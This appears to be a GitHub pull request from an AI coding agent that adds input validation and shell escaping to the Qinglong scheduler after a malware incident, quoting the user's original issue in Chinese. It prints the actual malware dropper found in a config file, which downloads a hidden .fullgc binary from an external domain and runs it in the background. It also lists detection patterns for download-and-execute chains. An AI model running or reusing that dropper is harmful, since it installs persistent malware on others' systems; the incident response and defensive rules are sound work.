Security: Prevent shell injection in cron tasks and config files

[Copilot]

Problem

Cron task fields (task_before, task_after, command) and config file writes lacked input validation and proper shell escaping. Reported incident: malicious code downloaded .fullgc binary from external domain, executed in background consuming 100% memory, and persisted by re-injecting itself.

Example of previously unvalidated malicious input:

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";
curl -fsSL -o "$b" "$u"&&chmod +x "$b"&&nohup "$b" >/dev/null 2>&1 &

Changes

Input Validation (back/validation/schedule.ts)

Added validateShellSecurity() to block:

• Command substitution: $(...), backticks
• File downloads: curl, wget, fetch
• External URLs: https?://
• Hidden file execution: /\.file
• Obfuscation patterns: base64, eval
• Suspicious combinations: (curl|wget).*>/dev/null.*&, /tmp/.*&&.*(chmod|\.\/)

Shell Escaping (back/services/cron.ts)

Replaced weak escaping with escapeShellArg():

// Before: allowed command injection via newlines
arg.replace(/'/g, "'\\''").replace(/;? *\n/g, ';')

// After: prevents command chains
arg.replace(/\r?\n/g, ' ').replace(/'/g, "'\\''")

Config File Security (back/api/config.ts)

Added content validation for config writes to detect:

• Download-execute chains: (curl|wget).*\|.*bash
• Permission escalation: (curl|wget).*&&.*chmod
• Hidden file downloads: (curl|wget).*\/\.\w+

Documentation (SECURITY_ENHANCEMENTS.md)

Remediation steps for affected users, detection patterns, and security best practices.

Security Impact

Prevents:

• Remote code execution via task field injection
• Malware download and persistence
• Command injection through shell metacharacters
• Hidden file execution in background processes

Original prompt

---

This section details on the original issue you should resolve

<issue_title>我这是中木马了吗 /data/db/.fullgc占用内存100%持续了几个月</issue_title>
<issue_description>### Qinglong version

正式版 v2.20.1

Steps to reproduce

名称 | .fullgc | PID | 1879430 | 状态 | sleeping -- | -- | -- | -- | -- | -- docker-entrypoi(1866020) | root | 10 1 | 0 B | 0 B 2026/02/08 12:54:59 | .fullgc /ql/data/db/.fullgc

看下来源是

配置文件的

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &

自己删除后,不定时还会自己加上.

运行的库只有faker3

What is expected?

1

What is actually happening?

1

System Info

Any additional comments?

No response</issue_description>

Comments on the Issue (you are @copilot in this section)

• Fixes 0 #2923

---

✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
qinglong	Ready	Preview, Comment	Feb 8, 2026 3:32pm
qinglong-back	Ready	Preview, Comment	Feb 8, 2026 3:32pm